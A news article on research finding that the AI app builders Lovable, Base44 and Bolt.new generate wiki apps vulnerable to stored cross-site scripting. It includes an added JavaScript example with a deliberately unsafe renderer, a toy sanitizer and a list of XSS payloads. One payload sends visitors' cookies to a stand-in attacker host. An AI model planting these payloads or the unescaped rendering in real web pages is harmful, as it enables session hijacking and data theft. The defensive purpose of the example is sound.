Lovable apps may be dangerous by design, research finds

AI app builders are exploding in value, but new tests reveal they may be silently shipping dangerous code into the wild.
Nvidia CEO Jensen Huang recently told CNBC, "I love Lovable!"
He named the AI app builder as one of the fastest-growing companies in enterprise AI, noting that all NVIDIA engineers are now using AI coders.
AI coding apps are booming. Lovable reportedly raised $200 million at a $1.8 billion valuation within eight months of launch. Base44, a solo project, was sold to Wix for $80 million in June, while Bolt raised $105.5 million at a $700 million valuation in January 2025.
However, the security of AI-generated code remains a cybersecurity nightmare, and a new test by OX Security raises alarms about the safety of AI app builders.
Findings show that Lovable, Base44, and Bolt.new generated web apps with exploitable vulnerabilities even when users asked for “secure” code.
The report argues that built-in security checks, such as the scan Lovable runs before publishing, are inconsistent: in the tests, Lovable’s scan caught the vulnerability only 66% of the time, while Bolt’s scan did not identify it at all.
“Inconsistent detection is worse than no detection at all – as it creates a false confidence while providing unreliable protection,” the researchers said in the report.
AI builders create apps that are vulnerable to attacks
OX tested the three platforms by asking each to create a wiki app with HTML editing functionality.
All three produced a rich-text/HTML editor that stored user input and rendered it back to readers. All three also shared the same core vulnerability: the generated code was open to stored cross-site scripting (XSS), allowing an attacker to save malicious HTML once and have it run in the browser of every later visitor, hijacking sessions and stealing data.
In the second test, the researchers prompted the AI to “secure” the code. A generic request to secure it left the vulnerability in place on all three platforms. Only when the researchers spelled out the specific security steps required did the builders respond, at least in part, and secure the code.
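To make the failure concrete, here is an added example in JavaScript; it is not code from the OX report or from Lovable, Base44 or Bolt.new. It pairs the stored-XSS rendering path found in all three generated wikis with the allowlist-based sanitizer that a builder’s framework layer should supply, and then replays a handful of constructed payloads through both renderers as the kind of deterministic check a “Security Check: Passed” badge should rest on. The tag and attribute allowlist, the page template, the payload list and every function name are assumptions made for this illustration.

```javascript
// Added example, not code from the OX report or from Lovable, Base44 or Bolt.new.
// Shows the stored-XSS pattern, an allowlist sanitizer standing in for the
// missing framework-level defense, and a replay check over both renderers.
// The allowlist, page template and payloads below are constructed for this illustration.

// Tags and attributes a wiki page may keep. Everything else is dropped.
const ALLOWED_TAGS = new Set([
  "p", "br", "b", "i", "em", "strong", "code", "pre",
  "ul", "ol", "li", "h2", "h3", "a",
]);
const ALLOWED_ATTRS = { a: new Set(["href"]) };

// Escape text so it can only ever be rendered as text.
function escapeHtml(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: whatever the editor stored is echoed into the page
// verbatim, so a payload saved once runs in every later reader's browser.
function renderPageUnsafe(storedHtml) {
  return `<article class="wiki">${storedHtml}</article>`;
}

// Hardened path: rebuild the markup from the allowlist instead of trusting it.
// Unknown tags are dropped (their text content is kept, escaped), unknown
// attributes are dropped, and href must be an absolute http(s) URL so
// javascript: and data: links cannot survive. Text is treated as raw
// characters, so entities already in the input are re-escaped (a known
// limitation of this toy; a production sanitizer normalizes entities first).
function sanitizeHtml(input) {
  const tagRe = /<\/?([a-zA-Z][a-zA-Z0-9]*)((?:\s+[^\s=>]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?)*)\s*\/?>/g;
  let out = "";
  let last = 0;
  let m;
  while ((m = tagRe.exec(input)) !== null) {
    out += escapeHtml(input.slice(last, m.index));
    last = m.index + m[0].length;
    const tag = m[1].toLowerCase();
    if (!ALLOWED_TAGS.has(tag)) continue; // drop the tag entirely
    if (m[0].startsWith("</")) {
      out += `</${tag}>`;
      continue;
    }
    let attrs = "";
    const allowed = ALLOWED_ATTRS[tag];
    if (allowed) {
      const attrRe = /([^\s=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;
      let a;
      while ((a = attrRe.exec(m[2])) !== null) {
        const name = a[1].toLowerCase();
        const value = (a[2] ?? a[3] ?? a[4] ?? "").trim();
        if (!allowed.has(name)) continue;
        if (name === "href" && !/^https?:\/\//i.test(value)) continue;
        attrs += ` ${name}="${escapeHtml(value)}"`;
      }
    }
    out += `<${tag}${attrs}>`;
  }
  out += escapeHtml(input.slice(last));
  return out;
}

function renderPageSafe(storedHtml) {
  return renderPageUnsafe(sanitizeHtml(storedHtml));
}

// Constructed payloads to replay through a generated wiki's editor-to-page path.
const PAYLOADS = [
  "<script>alert(document.cookie)</script>",
  "<img src=x onerror=\"fetch('https://attacker.example/?c=' + document.cookie)\">",
  "<a href=\"javascript:alert(1)\">click me</a>",
  "<svg><script>alert(1)</script></svg>",
  "<p onmouseover=alert(1)>hover</p>",
];

// Crude but deterministic: flags markup that would execute if rendered.
function containsExecutableMarkup(html) {
  return /<script\b|<svg\b|<img\b|\son[a-z]+\s*=|javascript:/i.test(html);
}

// Returns the payloads that still produce executable markup through renderFn.
// An empty list is the only acceptable "Security Check: Passed".
function checkRenderer(renderFn) {
  return PAYLOADS.filter((p) => containsExecutableMarkup(renderFn(p)));
}

console.log("unsafe renderer leaks:", checkRenderer(renderPageUnsafe).length, "of", PAYLOADS.length);
console.log("sanitized renderer leaks:", checkRenderer(renderPageSafe).length);
```

The hand-rolled sanitizer exists to show where the defense belongs: in the rendering path the framework hands every generated app, not in the features the user asked for. In a real deployment use a maintained parser-based sanitizer (DOMPurify in the browser or a server-side equivalent) rather than regexes, and run the replay check on every publish rather than sampling it, since a scanner that passes two runs in three is exactly the inconsistent detection the report warns about.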
These findings are significant, as AI builders lower the barrier to publishing apps, potentially multiplying the number of vulnerable deployments.
Non-technical creators are the least equipped to detect security gaps, yet they are the most likely to trust a “Security Check: Passed” badge that an AI builder may display falsely.
“The failure was not in the app’s features, as requested by the user, but in the underlying framework logic provided by the AI App Builder itself,” the report states.
However, the companies behind the builders pushed back on the findings, saying the issue was app-specific rather than platform-level. “After review, there doesn't seem to be any significant security impact as a result of the behavior you are describing. This is an application generated by Lovable – any misconfiguration on this is not part of our program Scope," Lovable said in response to the report.